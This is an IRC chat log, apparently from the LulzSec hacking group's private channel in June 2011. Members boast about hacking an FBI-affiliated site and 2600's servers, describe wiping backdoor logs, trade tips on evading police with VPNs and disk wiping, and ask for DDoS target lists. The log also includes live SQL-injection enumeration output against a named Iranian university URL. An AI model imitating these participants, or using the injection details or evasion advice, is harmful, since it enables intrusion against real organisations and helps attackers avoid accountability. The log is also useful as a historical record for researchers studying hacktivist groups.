20:41:41joepie91_laptopit breaks browsers, webservers, caching services, and a shitload of other shitJun 03 20:41:49neuron:P or %20Jun 03 20:41:54joepie91_laptopI knowJun 03 20:41:57joepie91_laptopbut they still tend to break shitJun 03 20:42:04joepie91_laptopI've often had unexplainable errors on webserversJun 03 20:42:13joepie91_laptopthat were fixed by removing spacesJun 03 20:43:11joepie91_laptop3.75 load average...Jun 03 20:43:12joepie91_laptop:|Jun 03 20:45:47&lt;hsien&gt;	yozJun 03 20:45:51neurono/Jun 03 20:48:19&lt;hsien&gt;	hows itJun 03 20:49:45joepie91_laptop28.3 load average on a pentium 3 FUCK YEAHJun 03 20:51:13neuronbrb need new ipJun 03 20:51:14*	Neuron has quit (Quit: leaving)Jun 03 20:51:43tflowwhat's anonops saying about this joepie91?Jun 03 20:52:29*	Neuron (Neuron@HA-875.col.tt2aeb.IP) has joined #pure-eliteJun 03 20:54:41joepie91_laptopidkJun 03 20:54:47joepie91_laptopnotlogged on from lappyJun 03 20:55:01joepie91_laptoplemme walk to my pcJun 03 21:00:48neuronjoepie91_laptop: what os?Jun 03 21:01:07joepie91laptop = puppy linuxJun 03 21:01:24joepie91tflow: people seem to think lulzsec is winJun 03 21:01:26neuronno :P like what os for your box.. ubuntu,devian,centos,suse,fedoraJun 03 21:01:28joepie91haven;t read much yetJun 03 21:01:31joepie91I'm tiredJun 03 21:01:32joepie91ohJun 03 21:01:33joepie91derpJun 03 21:01:41*	joepie91 saw laptop and OS in one sentenceJun 03 21:01:43joepie91debian of courseJun 03 21:01:45joepie91:DJun 03 21:04:01tflowhttp://pastebin.com/kixK4rfuJun 03 21:04:13tflowblackhat seo, trying to capitilize on lulzsec lolJun 03 21:04:21tflowbut how the fk did it get 18k viewsJun 03 21:06:47joepie91_laptoptflowJun 03 21:06:50joepie91_laptopproxy view increaserJun 03 21:06:53joepie91_laptopor similar toolsJun 03 21:07:02joepie91_laptophttp://www.sven-slootweg.nl/downloadsJun 03 21:07:05joepie91_laptopI have a really crappy oneJun 03 21:07:09joepie91_laptopthat I made for someone a long time agoJun 03 21:08:07neuronjoepie91_laptop: check pmJun 03 21:08:36joepie91_laptopI know :PJun 03 21:08:37joepie91_laptopsecJun 03 21:12:54joepie91_laptopSabu, tflow, TopiaryJun 03 21:12:55joepie91_laptop&lt;cedr&gt;[18:06:30] &lt;cedr&gt; Fuck FBI Friday (FFF).rar is not RAR archive - ah well.Jun 03 21:12:56joepie91_laptop&lt;cedr&gt;[18:06:52] &lt;cedr&gt; ohhJun 03 21:12:56joepie91_laptop&lt;cedr&gt;[18:06:55] &lt;cedr&gt; its a fucking .zipJun 03 21:12:56joepie91_laptop&lt;cedr&gt;[18:06:57] &lt;cedr&gt; failJun 03 21:12:56joepie91_laptop&lt;cedr&gt;did they purposely name their zip archive .rar? :pJun 03 21:13:27tflowwatJun 03 21:13:32joepie91_laptopidkJun 03 21:13:40&lt;hsien&gt;	dude weirdJun 03 21:13:41tflowwe've never uploaded any rar/zip archiveJun 03 21:13:48&lt;hsien&gt;	i owned a box named cedrJun 03 21:13:48joepie91_laptopit's the torrentJun 03 21:13:55joepie91_laptopalso, if someone has a pastebin account or feels like making one... report that spam submission :DJun 03 21:14:02*	Topiary trollface.batJun 03 21:14:09joepie91_laptoplolJun 03 21:14:11joepie91_laptopTopiaryJun 03 21:14:13TopiaryI made a zip and called it rar because it trolls the shit out of faggotsJun 03 21:14:14joepie91_laptopas I just saidJun 03 21:14:24joepie91_laptopif you want epic over 9000 end boss bonus level pointsJun 03 21:14:29joepie91_laptopmake cloudflare accept bitcoinsJun 03 21:14:31joepie91_laptopfor their Pro packageJun 03 21:14:50joepie91_laptop:DJun 03 21:40:32*	t[2] (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-eliteJun 03 21:43:27*	Topiary has quit (Ping timeout: 121 seconds)Jun 03 21:44:31*	t[2] has quit (Quit: ==&gt;)Jun 03 21:45:03*	Topiary (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-eliteJun 03 21:58:56*	tflow has quit (A TLS packet with unexpected length was received.)Jun 03 21:59:16*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 03 22:02:53joepie91_laptopwelJun 03 22:02:59joepie91_laptopI think it's time for meJun 03 22:03:03joepie91_laptopto meet with Mr. DreamJun 03 22:03:06joepie91_laptopgoodnight allJun 03 22:03:06Recursionholy shitJun 03 22:03:09joepie91_laptop?Jun 03 22:03:09sabuhiJun 03 22:03:10Recursionwtf happened today?Jun 03 22:03:13sabua lot ;)Jun 03 22:03:13joepie91_laptoplololJun 03 22:03:15sabucheck twitterJun 03 22:03:16sabuROFLJun 03 22:03:27joepie91_laptoplulzsec declared war to the US?Jun 03 22:03:28joepie91_laptop:PJun 03 22:03:28RecursionI caught the jist of itJun 03 22:04:09joepie91_laptopbut reallyJun 03 22:04:11joepie91_laptopnight guysJun 03 22:04:18Recursiong'nightJun 03 22:05:31stormyoJun 03 22:07:08stormwent swimmingJun 03 22:07:12stormhad some beersJun 03 22:07:19stormtoked on my e cigaretteJun 03 22:07:22stormgood night manJun 03 22:07:25stormgood nightJun 03 22:07:25storm:DJun 03 22:29:42*	Recursion has quit (Quit: leaving)Jun 03 22:29:54sabuhiJun 03 22:29:56sabuwell guysJun 03 22:30:07sabuthose of you that are still with us through thisJun 03 22:30:22sabumaintain alert, make sure you're behind vpns dont matter whatJun 03 22:30:32sabuand dont fearJun 03 22:30:33sabuwe're okJun 03 22:30:34sabuw/i n2Jun 03 22:43:27neuronbackJun 03 22:43:37sabusup neuronJun 03 22:44:15neuronSabu: did we lose people?Jun 03 23:28:15stormagreedJun 03 23:28:16stormdid we?Jun 03 23:31:10sabuyeahJun 03 23:31:18stormwho?Jun 03 23:31:23saburecursion and devurandom quit respectfullyJun 03 23:31:27sabusaying they are not up for the heatJun 03 23:31:32sabuyou realize we smacked the fbi todayJun 03 23:31:36sabuthis means everyone in hereJun 03 23:31:42sabumust remain extremely secureJun 03 23:31:49stormSabuJun 03 23:31:55stormdid you wipe the pbs bd logs?Jun 03 23:31:58sabuyesJun 03 23:31:59stormkJun 03 23:32:01sabuall pbs logs are cleanJun 03 23:32:04stormthen i'm game for some moreJun 03 23:32:06sabu;)Jun 03 23:32:08sabuwe're goodJun 03 23:32:14sabuwe got a good team hereJun 03 23:33:53stormheheJun 03 23:33:53stormorlyJun 03 23:34:06sabu;]Jun 03 23:34:12stormsoJun 03 23:34:16stormwhat did we do to the fbiJun 03 23:34:24sabuyou dont know?Jun 03 23:34:25sabuROFLJun 03 23:34:28stormnopeJun 03 23:34:30sabutwitter.com/lulzsecJun 03 23:34:33stormi was gone all dayJun 03 23:34:34saburavaged them tonightJun 03 23:34:37stormlmaoJun 03 23:39:02neuronO/Jun 03 23:39:14neurontflow: YoJun 03 23:40:06stormAfter doing so, we contacted Karim and told him what we did. After a few discussions, he offered toJun 03 23:40:06stormpay us to eliminate his competitors through illegal hacking means in return for our silence. Karim,Jun 03 23:40:06storma member of an FBI-related website, was willing to give us money and inside info in order to destroyJun 03 23:40:07stormhis opponents in the whitehat world. We even discussed plans for him to give us insider botnet information.Jun 03 23:40:09stormROFLMFAOJun 03 23:40:10stormROFLMFAOJun 03 23:40:11stormwowJun 03 23:40:16stormepic readingJun 03 23:40:32neuronYo anyone have any extra tips for staying safe?Jun 03 23:43:08sabuclean your box out, make sure any sensitive info you have encrypted on a usb stickJun 03 23:43:12sabustay behind your vpnJun 03 23:43:16sabufrom now on your vpn is your weaponJun 03 23:43:23sabuwithout your weapon you are nothingJun 03 23:43:30sabuwithout you it is notihng blah blah blahJun 03 23:43:34neuronhahaJun 03 23:43:39sabuand dont do nothing we dont approve of :DJun 03 23:44:04neuronAlright right now.. My "hackbox" has 512 aes encryption on the entire harddriveJun 03 23:44:18neurontwo passwords and truecrypt on info concerning anything hacking relatedJun 03 23:44:24neuronand my vpn is HideMyAssJun 03 23:44:43stormsabuJun 03 23:44:55stormmy netbook will be here win only a matter of daysJun 03 23:45:01stormand ill be wiping my entire systemJun 03 23:45:05stormdesktopJun 03 23:45:14stormand just encrypting the entire driveJun 03 23:45:16neuronim already wiping my enitre desktopJun 03 23:45:16stormafter i scrub itJun 03 23:45:58sabuyeahJun 03 23:46:01sabuwipe it allJun 03 23:46:04sabuim wiping all my shit nowJun 03 23:46:04sabuBUTJun 03 23:47:09neuron?Jun 03 23:47:57sabustorm: http://www.youtube.com/watch?v=SUlkAPxrwcwJun 03 23:48:04sabuLOLOL thats my fav vid everJun 03 23:48:46neuronWhat do they call shells that have no loggingJun 03 23:48:48neuroni know theres a termJun 03 23:50:22neuron"chaosbox"Jun 03 23:54:06storm@LulzSec Ceasefire and we'll get you some sweatshirts. Plus a decent lawyer and movie agent if it comes to that. Your channels are restored.Jun 03 23:54:11stormfrom 2600Jun 03 23:54:25stormand lmao at that guy dancingJun 03 23:55:00sabududeJun 03 23:55:28neuron?Jun 03 23:56:26sabuthat vid cracks me upJun 03 23:57:10stormSabuJun 03 23:57:25sabusupsJun 03 23:57:25stormI'm amazed that 2600 took their beating like champsJun 03 23:57:29stormand sucked our cocks.Jun 03 23:57:30sabuyehJun 03 23:57:32sabuthey didJun 03 23:57:37sabugotta understand thoughJun 03 23:57:38stormrespect to thatJun 03 23:57:39stormseriouslyJun 03 23:57:42sabuthey're old timersJun 03 23:57:44neuronhahaJun 03 23:57:47sabuso they stil think like thatJun 03 23:57:55stormhehJun 03 23:57:58stormwellJun 03 23:58:06stormi feel abd for fucking their servers kindaJun 03 23:58:06storm;xJun 03 23:58:10stormbad evenJun 03 23:58:13stormbut they deserved itJun 03 23:58:15neuronlolJun 03 23:58:24stormthat was lame that they took registration rights from our channelJun 03 23:58:44neuronAnyone know if bt5 has a backdoor like bt4 black hat edition did?Jun 03 23:58:57stormweJun 03 23:58:58stormerJun 03 23:59:05stormwe're going to have a backtrack lulzsec versionJun 03 23:59:10stormso it doesnt matterJun 03 23:59:13stormbut it doesntJun 03 23:59:17stormthat i know ofJun 03 23:59:48neuronHmm im debating of just setting my hackbox up has arch againJun 03 23:59:53neuronRight now its bt5Jun 04 00:00:03neuronbut im weary it has a bdJun 04 00:00:34stormuse ubuntu :DJun 04 00:00:49stormarch is cool if you like kdeJun 04 00:00:56neuronlolJun 04 00:01:00neuroni use awesomewm :PJun 04 00:01:06stormor gentoo for customisable shitJun 04 00:03:22neuronstorm: im gonna setup arch againJun 04 00:03:26storm:DJun 04 00:03:28neuronyou guys won't see me for a few hours lolJun 04 00:03:30stormKDE is prettyJun 04 00:03:36neuroni use awesome-wmJun 04 00:03:36stormalrightJun 04 00:03:38stormlater braJun 04 00:03:50neuronhttp://awesome.naquadah.org/Jun 04 00:04:48*	storm has quit (Quit: BitchX-1.1-final -- just do it.)Jun 04 00:04:58neuronSabu: be back in a bit broJun 04 00:05:26sabukkJun 04 00:06:34*	foolish (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pure-eliteJun 04 00:06:37&lt;foolish&gt;	there we goJun 04 00:06:40*	foolish is now known as stormJun 04 00:06:48stormhad to load up irssiJun 04 00:07:21neuronlolJun 04 00:07:22neuronwbJun 04 00:07:25stormtytyJun 04 00:07:58*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 00:08:21*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 00:08:33neuronwb tflowJun 04 00:29:07neuronalright guys im out for a bit for a arch install o/Jun 04 00:29:12*	Neuron has quit (Quit: leaving)Jun 04 00:32:41sabugoodnightJun 04 00:46:47*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 00:52:31*	anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-eliteJun 04 00:52:40*	anonny is now known as kl0psJun 04 00:52:45kl0pshello o/Jun 04 00:57:53kl0psSabu, lol, good morning :) ... i need a target :/Jun 04 01:00:32lolkl0ps hello \:D/Jun 04 01:00:45kl0ps\o/Jun 04 01:00:54kl0pskayla :-* :DJun 04 01:02:01lolhow are you :)?Jun 04 01:02:07kl0pslulzsec got in germany very famous too ;)Jun 04 01:02:16lol;)Jun 04 01:03:04kl0psgoot, a little bit tired, but ok. i have to programming the hole day 4 study -.-Jun 04 01:03:16kl0psi did not sleep this nightJun 04 01:03:22lolwhy not :D?Jun 04 01:03:38kl0psparty ;)Jun 04 01:03:53kl0pshow are u sweety?Jun 04 01:04:29kl0psbrb, buying beer. (yes the crazy germans) :DJun 04 01:07:45kl0psreJun 04 01:09:50kl0pslol, i have ti tried to sqli a iran uni, but i am mistake. have u more luck then me? http://intstudy.ut.ac.ir/publication.php?sid=18Jun 04 01:09:55kl0ps-i +oJun 04 01:10:28kl0psthere is a vuln, but i am not able -.-Jun 04 01:14:33kl0pswhat about i am talking? -.-Jun 04 01:14:34kl0ps[06:14:07] [INFO] target url appears to be UNION injectable with 6 columnsJun 04 01:14:40kl0pssryJun 04 01:15:12kl0psweb server operating system: Windows 2003Jun 04 01:15:12kl0psweb application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0Jun 04 01:15:12kl0psback-end DBMS: MySQL 5.0.11Jun 04 01:16:56lolCount(table_name) of information_schema.tables Where table_schema=0x696E747374756479 is 12Jun 04 01:16:56lolTables found: cnt,country,encountry,enmain,enmain2,ennews,enpublication,gallery,main,main2,news,publicationJun 04 01:16:56lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x636E74 is 2Jun 04 01:16:56lolColumns found: id,countJun 04 01:16:56lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x636F756E747279 is 7Jun 04 01:16:56lolColumns found: id,date,titr,body,lid,img,pdfJun 04 01:16:56lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E636F756E747279 is 7Jun 04 01:16:56lolColumns found: id,date,titr,body,lid,img,pdfJun 04 01:16:56lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6D61696E is 6Jun 04 01:16:56lolColumns found: id,date,titr,body,img,pdfJun 04 01:16:56lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6D61696E32 is 6Jun 04 01:16:57lolColumns found: id,date,titr,body,img,pdfJun 04 01:16:58lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6E657773 is 7Jun 04 01:16:59lolColumns found: id,date,type,titr,body,lid,imgJun 04 01:17:00lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E7075626C69636174696F6E is 7Jun 04 01:17:01lolColumns found: id,date,type,titr,body,img,pdfJun 04 01:17:02lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x67616C6C657279 is 3Jun 04 01:17:03lolColumns found: id,date,titrJun 04 01:17:04lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6D61696E is 6Jun 04 01:17:05lolColumns found: id,date,titr,body,img,pdfJun 04 01:17:07lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6D61696E32 is 6Jun 04 01:17:07lolColumns found: id,date,titr,body,img,pdfJun 04 01:17:08lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6E657773 is 7Jun 04 01:17:09lolColumns found: id,date,type,titr,body,lid,imgJun 04 01:17:10lolCount(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x7075626C69636174696F6E is 7Jun 04 01:17:12lolColumns found: id,date,type,titr,body,img,pdfJun 04 01:17:13loldoesn't look like there's any passwords in itJun 04 01:17:27kl0ps[06:17:18] [INFO] retrieved: "&lt;p class="MsoNormal" style="text-align: justify; line-height: 140%; margin: 0cm 0cm 10pt; unicode-bidi: embed; direction: rtl; mso-margin-top-alt: auto; mso-margin-bottom-alt...[06:17:19] [INFO] retrieved: "&lt;p class="MsoNormal" style="text-align: justify; line-height: 140%; margin: 0cm 0cm 10pt; unicode-bidi: embed; direction: rtl; mso-margin-top-alt: auto; mso-margin-bottom-alt...[06:17:20] [INFO] retrieved: "Ù…Ø±Jun 04 01:17:27kl0psÚ©Ø² Ù…Ø·Ø§Ù„Ø¹Ø§Øª Ø¹Ø§Ù„ÛŒ Ø¨ÛŒÙ† Ø§Ù„Ù…Ù„Ù„ÛŒ Ø¨Ù‡ Ù…Ù†Ø§Ø³Ø¨Øª Ø³ÛŒ Ø§Ù…ÛŒÙ† Ø³Ø§Ù„Ú¯Ø±Ø¯ Ú¯Ø±Ø§Ù…ÛŒØ¯Ø§Ø´Øª Ù‡ÙØªÙ‡ Ø¯ÙØ§Ø¹ Ù…Ù‚Ø¯Ø³ Ø¨Ø±Ù†Ø§Ù…Ù‡ Ø³ÙˆÙ… Ø§Ø² Ø³Ù„Ø³Ù„Ù‡ Ù…ÛŒØ²Ú¯Ø±Ø¯Ù‡Ø§ÛŒÛŒ Ù¾ÛŒØ±Ø§Ù…ÙˆÙ† Ø±ÙˆØ§Ø¨Ø· Ø¨ÛŒÙ† Ø§Ù„Ù…Ù„Ù„ÛŒ Ùˆ Ø§Ø¨Ø¹Ø§Ø¯ Ù†Ø¸Ø±ÛŒ Ùˆ Ø¹Ù…Ù„ÛŒ Ø¬Ù†Ú¯ ØªØ­Ù…ÛŒÙ„ÛŒ Ø±Ø§ Ø¨ÛŒ...Jun 04 01:17:38kl0ps;)Jun 04 01:17:48kl0psi think so -.-Jun 04 01:18:29kl0psi am dumping the db and we seeJun 04 01:20:59kl0psno hit -.-Jun 04 01:27:49*	lol has quit (A TLS packet with unexpected length was received.)Jun 04 01:28:03*	lol (lol@HA-372.t00.0st1iv.IP) has joined #pure-eliteJun 04 01:28:07kl0pshttp://skype-open-source.blogspot.com/Jun 04 01:28:45kl0pswithout the fucking anti debuggersJun 04 01:28:47lolbe back later im gonnag etsome rest &lt;3 :)Jun 04 01:28:59kl0pshfJun 04 01:29:13lol:)Jun 04 01:29:58*	lol is now known as lol|zzZZZZzzJun 04 01:30:15*	lol|zzZZZZzz is now known as lol|awayJun 04 02:47:24*	kl0ps has quit (Ping timeout: 121 seconds)Jun 04 03:10:24stormyoooJun 04 03:10:57*	virtual (virtual@HA-bq2.skb.2n3ihv.IP) has joined #pure-eliteJun 04 03:11:45*	virtual is now known as trollpollJun 04 03:11:48trollpollmorning allJun 04 03:11:50stormsup trollJun 04 03:12:25trollpolllooking at lulzsec night fishesJun 04 03:12:32stormlolJun 04 03:12:51trollpolland loling of course :PJun 04 03:12:54stormsabuJun 04 03:13:07stormwhere's my updated target list?Jun 04 03:13:14storm:&gt;Jun 04 03:13:19trollpollbtw, dont you think that karim affair is more for Anonymous than for lulzsec?Jun 04 03:13:23stormi need stuff to fire my cannons atJun 04 03:13:36stormtrollpoll: noJun 04 03:13:39stormnot personalluJun 04 03:13:44stormpersonally evenJun 04 03:14:09trollpollbecause it happen after lulz hacking?Jun 04 03:15:50stormI'm finally able to listen to our recordingJun 04 03:16:13trollpollwell, anyway, everybody seems to assume that lulzsec = anonymous...Jun 04 03:16:43stormwell from wat ive seenJun 04 03:16:48stormi have seen the oppositeJun 04 03:16:58trollpollhmmmJun 04 03:16:58stormwhere people want anonymous to own usJun 04 03:17:08trollpolllolJun 04 03:18:22trollpollthe first phraseJun 04 03:18:23trollpoll"It has come to our unfortunate attention that NATO"Jun 04 03:18:33trollpollNATO was talking about AnonymousJun 04 03:18:36trollpollnot about lulzsec...Jun 04 03:19:22stormI thought it was _anyone_ partaking in anti hacktivism personally.Jun 04 03:20:17trollpollyes, but they focused on AnonymousJun 04 03:20:44trollpollbut, its ok... i just read yesterday something like "lulzsec a part of anonymous group"..Jun 04 03:21:12stormthey'll learnJun 04 03:21:13storm:pJun 04 03:21:14trollpollor something like this in a web with some legal stuff about what we doJun 04 03:22:58trollpoll&lt;whirlpool&gt; maybe an ATM fetishist ^_^Jun 04 03:23:01trollpollepic lolJun 04 03:23:20stormlollJun 04 03:26:56*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 03:27:13tflowsite still up \o/Jun 04 03:27:18stormyeah i noticedJun 04 03:27:19storm:DJun 04 03:29:59*	trollpoll has quit (A TLS packet with unexpected length was received.)Jun 04 03:30:20*	trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #pure-eliteJun 04 03:31:39trollpollhey, is anonops.blogspot.com our?Jun 04 03:59:53stormwhere's TopiaryJun 04 03:59:59stormtweeting away no doubtJun 04 04:00:42Topiary?Jun 04 04:00:45Topiaryjust woke upJun 04 04:01:48*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 04:02:45*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 04:09:49stormlolJun 04 04:09:51stormsup?Jun 04 04:17:31stormTopiary:Jun 04 04:17:34*	lol|away is now known as lolJun 04 04:17:41stormI need an updated target list to ddos.Jun 04 04:18:02storm2600.net is old newsJun 04 04:18:13stormhey KaylaJun 04 04:18:14storm&lt;3 :DJun 04 04:26:24Topiaryhmm not sure manJun 04 04:35:51*	trollpoll has quit (Quit: Leaving)Jun 04 06:08:47*	neuron (neuron@HA-f21.345.a84vd3.IP) has joined #pure-eliteJun 04 06:08:54neuronlol took a bit longer then i thoughtJun 04 06:09:46*	lol has quit (A TLS packet with unexpected length was received.)Jun 04 06:09:57*	lol (lol@HA-r5m.i6c.9ln5eg.IP) has joined #pure-eliteJun 04 06:10:15neuronhey lol  o.Jun 04 06:15:37lolhey :DJun 04 06:16:03neuronwhat are you doing up this late :PJun 04 06:16:19lol:DJun 04 06:16:22lolnm :ppPPpJun 04 06:16:41neuronlol hax0ring stuff?Jun 04 06:22:56neuronits 3am sleep tiem o./Jun 04 06:23:02*	neuron has quit (Quit: leaving)Jun 04 06:39:02stormO_oJun 04 06:40:02lolhi storm :D &lt;3Jun 04 06:40:20stormhiyaJun 04 06:40:49lolhows you? :DJun 04 06:41:15stormI'm OK.Jun 04 06:41:18stormhow're you?Jun 04 06:42:48lolim fine thanks :D just a bit angry lol xDJun 04 06:43:09lollololol i went to go get some cerials from down stairs and i opend my doorJun 04 06:43:23loland trapped my toe under the door when i opend it xDJun 04 06:43:24lollmaoJun 04 06:43:28lolit hurts :(Jun 04 06:43:33stormROFLJun 04 06:43:35stormwow.Jun 04 06:43:38stormsounds painful.Jun 04 06:43:53lollike the gap under the door xDJun 04 06:43:59lol:(Jun 04 06:44:20lolnow im just laid on my bed with my netbook feeling sorry for my self xDJun 04 06:44:32lolin pain!Jun 04 06:44:32lolxDJun 04 06:44:41stormhahaJun 04 06:44:47stormwhat kinda netbook does u haz?Jun 04 06:44:51stormI'm getting oneJun 04 06:49:31loljust a silly asus thing :DJun 04 06:49:41lollolJun 04 06:49:42lolThere are 0 users and 32 invisible on 1 serversJun 04 06:49:42lol1 IRC Operators onlineJun 04 06:49:42lol20 channels formedJun 04 06:49:42lolI have 32 clients and 0 serversJun 04 06:49:42lol-Jun 04 06:49:42lolCurrent local users: 32  Max: 32Jun 04 06:49:42lolCurrent global users: 32  Max: 32Jun 04 06:49:42lol-Jun 04 06:49:42lolHighest connection count: 32 (32 clients) (133 connections received)Jun 04 06:49:42lol-Jun 04 06:49:43lolcollective.2600.net ------------------------------ | Users:    32 (100.0%)Jun 04 06:49:44lolEnd of /MAPJun 04 06:49:53lollol 2600 is dead xDJun 04 06:51:39*	joepie91 has quit (Ping timeout: 121 seconds)Jun 04 06:51:42stormlolJun 04 06:51:45*	joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure-eliteJun 04 06:51:46stormi feel badJun 04 06:51:47storm:&lt;Jun 04 06:52:27stormasus' are good netbooksJun 04 06:52:38stormi almost got oneJun 04 06:53:53lolthey good, but i should have really got one with a HDD rather than an SSD because SSD's only have a certain ammount of writesJun 04 06:54:04lolso shredding everything with guttman can't be good for it :SJun 04 06:54:20stormlol.Jun 04 06:54:30stormI'll be shredding my wntire system when my laptop comesJun 04 06:54:36stormentire even.Jun 04 06:54:40lolDBAN :DJun 04 06:54:51loluse DBAN :DDDJun 04 06:54:58lolgood old boot and nukeJun 04 06:54:58*	storm duly notedJun 04 06:55:22stormi dont have much i wish to saveJun 04 06:55:35stormmaybe some porn, music, and some sensetive filesJun 04 06:55:39storm:DJun 04 06:56:09lollol xDJun 04 07:00:29stormim brushing my teeth &gt;;xJun 04 07:00:44lol:DJun 04 07:07:10joepie91morning allJun 04 07:07:14joepie91also, om nom nom ddosJun 04 07:07:29stormlolJun 04 07:07:29stormhiJun 04 07:13:30storm11:12 -!- madjack.2600.net --------------------------------- | Users:   126  (22.2%)Jun 04 07:13:33storm11:12 -!-  '- blackbeard.2600.net -------------------------- | Users:     0  (0.0%)Jun 04 07:13:36storm11:12 -!-      |- bartholomew.2600.net --------------------- | Users:   105  (18.5%)Jun 04 07:13:40storm11:12 -!-      |- djslocker.2600.net ----------------------- | Users:   327  (57.7%)Jun 04 07:13:43storm11:12 -!-      '- services.2600.net ------------------------ | Users:     9Jun 04 07:13:45stormcollective was unlinkedJun 04 07:13:50lollolJun 04 07:13:52lolxDJun 04 07:13:58*	t[2] (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-eliteJun 04 07:14:03storm;pJun 04 07:15:46&lt;t[2]&gt;	Account Balance is: 24.52 BTC (414.39 USD @ 16.90)Jun 04 07:15:48&lt;t[2]&gt;	our donations ^Jun 04 07:15:49stormkayla were you bottle_of_rum?Jun 04 07:15:54stormjesus christJun 04 07:15:57stormnice jobJun 04 07:16:24&lt;t[2]&gt;	bottle of rum = tflowJun 04 07:17:12*	Topiary has quit (Ping timeout: 121 seconds)Jun 04 07:17:43tflowkayla was parr0tJun 04 07:18:32lolwhy lol :D?Jun 04 07:18:38loli was parr0t ;3Jun 04 07:21:17*	t[2] is now known as TopiaryJun 04 07:21:20*	Topiary has quit (Quit: --&gt;)Jun 04 07:21:26*	Topiary (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-eliteJun 04 07:21:36Topiaryexciting and newJun 04 07:24:21TopiaryYou have 38,739 followersJun 04 07:24:34Topiaryhttp://pastebin.com/trendsJun 04 07:24:48tflowwe should really probably make a pastebin accountJun 04 07:25:10tflowbut already takenJun 04 07:25:18tflowhttp://pastebin.com/u/lulzsecJun 04 07:32:13joepie91@2600Jun 04 07:32:14joepie912600 MagazineJun 04 07:32:14joepie91Hacked websites, corporate infiltration/scandal, IRC wars, new hacker groups making global headlines - the 1990s are back!Jun 04 07:32:14joepie91lolJun 04 07:32:32joepie91alsoJun 04 07:32:38joepie91fucking lol'd @ norton commentJun 04 07:36:03joepie91LOLJun 04 07:36:10joepie91did you guys notice how practically noone reported on the FBI hack?Jun 04 07:36:19tflowthat's because it's saturdayJun 04 07:36:26tflowsame thing happened with acs lawJun 04 07:36:31tflowwe released on fridayJun 04 07:36:35tflow0 reportsJun 04 07:36:38tflowthen come mondayJun 04 07:36:41tflow300 reportsJun 04 07:36:52joepie91I knowJun 04 07:36:55joepie91but even the blogsJun 04 07:37:01joepie91who are usually very quick with reporting on thingsJun 04 07:37:08joepie91haven't really written shit so far :pJun 04 07:37:13tflowtrueJun 04 07:37:18tflowlike kerbs hasn't reported it yetJun 04 07:37:23tflowalthough sophos hasJun 04 07:37:27Topiarya few have written on usJun 04 07:37:29joepie91ya, indeed, I noticed naked securityJun 04 07:37:41TopiaryInternational Business Times, cnet, Parmy is doing a piece later todayJun 04 07:38:03TopiaryLAtimesJun 04 07:38:09joepie91CNET, LA Times, IB Times, INQUISITR, SophosJun 04 07:38:11joepie91that's my list atmJun 04 07:38:34joepie91http://www.inquisitr.com/111203/how-to-piss-off-the-fbi-hack-their-buddys-infragard-site/Jun 04 07:38:39TopiaryyeahJun 04 07:38:50joepie91people should use things like google news moreJun 04 07:38:54joepie91broadens their view etcJun 04 07:39:25Topiaryyou know, even without our pastebin being linked on news sites, it still has around 55,000 viewsJun 04 07:39:48joepie91lolJun 04 07:42:41joepie91"Had we agreed to provide this data to them, LulzSec would have been able to grow the size and scope of their DDoS (distributed denial-of-service) attack and fraud capabilities."Jun 04 07:42:42joepie91lolJun 04 07:42:43joepie91watJun 04 07:43:26joepie91&gt;fraud capabilitiesJun 04 07:44:05TopiaryI replied to himJun 04 07:44:13Topiaryhttp://pastebin.com/AjVd0L9EJun 04 07:44:59joepie91A Nintendo spokesman released this statement when asked for comment: "The protection of our customer information is our utmost priority. Therefore, we constantly monitor our security. This particular situation was a server configuration issue that we investigated and resolved a few weeks ago. The server contained no consumer information."Jun 04 07:45:00joepie91^ true?Jun 04 07:45:25joepie91about the server configJun 04 07:45:42tflowyesJun 04 07:45:43tflowtrueJun 04 07:45:48tflowit wasn't a big hackJun 04 07:50:35tflowhttp://www.gmanews.tv/story/222563/technology/hackers-taunt-fbi-after-hitting-partner-sitesJun 04 07:50:40tflowLulzSec said that since the Obama administration treats hacking as an act of war, â€œwe just hacked an FBI-affiliated website and leaked its user base."Jun 04 07:50:43tflowI love that lineJun 04 07:52:12joepie91my god..... http://codepad.viper-7.com/XeOvIUJun 04 07:52:21joepie91some people should learn to format their fucking codeJun 04 07:52:32joepie91I reformatted it for him &gt;.&gt;Jun 04 07:52:34joepie91http://codepad.viper-7.com/S0XZCgJun 04 07:54:13lollolJun 04 07:56:30joepie91like, srslyJun 04 07:56:33joepie91that code was just horribleJun 04 07:56:37joepie91and so many fails in such a simple scriptJun 04 07:56:38joepie91:|Jun 04 07:58:19joepie91gave him a link to w3schoolsJun 04 07:58:24joepie91and told him to learn how to format codeJun 04 07:59:20lolxDJun 04 07:59:21tflowlol why would you want a function that returns 1-3Jun 04 07:59:29tflowaccording to the paramsJun 04 